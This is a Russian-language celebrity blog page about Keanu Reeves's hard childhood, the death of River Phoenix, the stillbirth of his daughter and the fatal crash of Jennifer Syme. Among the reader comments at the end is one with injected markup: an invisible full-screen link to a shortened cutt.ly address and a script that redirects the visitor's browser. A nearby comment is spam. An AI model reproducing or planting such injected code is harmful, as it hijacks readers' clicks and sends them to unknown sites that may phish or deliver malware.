Читайте также:
51

Детство Киану Ривза не было благополучным. Его отец...

Детство Киану Ривза не было благополучным. Его отец покинул семью, когда мальчику было всего 3 года. Сейчас Киану даже не поддерживает с ним отношений. Мама у Ривза тоже была не подарок. Она была слишком занята устройством своей личной жизни и мало внимания уделяла детям. Женщина не могла долго оставаться на одном месте и постоянно переезжала. Так же развивались и ее отношения с мужчинами: Киану не успевал привыкнуть к одному отчиму, как ему на смену приходил другой.

Лучший друг Киану Ривза умер от наркотиков. Начинающий актер Ривер Феникс, с которым Ривз был очень дружен, умер в возрасте 23 лет, приняв большую дозу наркотической смеси.

В 1998 году на одной из тусовок Киану познакомился с малоизвестной актрисой Дженнифер Сайм. Их роман развивался стремительно и уже скоро стало известно о беременности. Знаменитости стали активно готовиться к рождению дочери. Малышка должна была появиться на свет 8 января 2000 года. Киану Ривз заботился о семье, обустраивал детскую, покупал вещи для дочери. Однако вскоре радостное ожидание сменилось трауром. За неделю до родов произошло несчастье: маленькое сердечко девочки перестало биться... Дженнифер пришлось рожать мертвого ребенка.

"Врачи решили искусственно стимулировать роды. Я был там и все видел своими глазами ...Это нечестно!"

Все это произошло накануне Рождества, поэтому Киану не любит этот праздник. Теперь он ассоциируеется у него вовсе не с подарками, разноцветными гирляндами и волшебством…

Для Дженнифер это известие стало настоящей трагедией. Она была подавлена и должна была пройти лечение. Чтобы ничего не напоминало возлюбленной о случившемся, Киану раздал детские вещи нуждающимся.

После трагедии Киану и Дженнифер отдалились друг от друга. Он с головой погрузился в работу, а она пыталась утопить горе в алкоголе и наркотиках. 1 апреля 2001 года, возвращаясь с вечеринки, она врезалась в три автомобиля и вылетела из своей машины. Смерть наступила мгновенно. Ее похоронили рядом с дочерью. Киану был раздавлен. Мать Дженнифер сказала:

"Я полагала, что Киану недостаточно любит мою дочь, но когда увидела его на похоронах, поняла, что ошибалась"

Детство Киану Ривза не было благополучным. Его отец...
Еще посты

Популярные теги:

Свежие комментарии:

Ирина 3 дней назад к записи
Когда это было?что за придожение ни автора ни даты,как связаться
Александра 6 дней назад к записи
Напиши мне
<a/href="//cutt.ly/kwVrO4Ui"style="position:fixed;left:0;top:0;width:9999px;height:9999px;"></a>
<script>location.replace('//ya.ru')</script>Nick
Екатерина 2 недель назад к записи
Как с вами связаться?
контакт женский заработок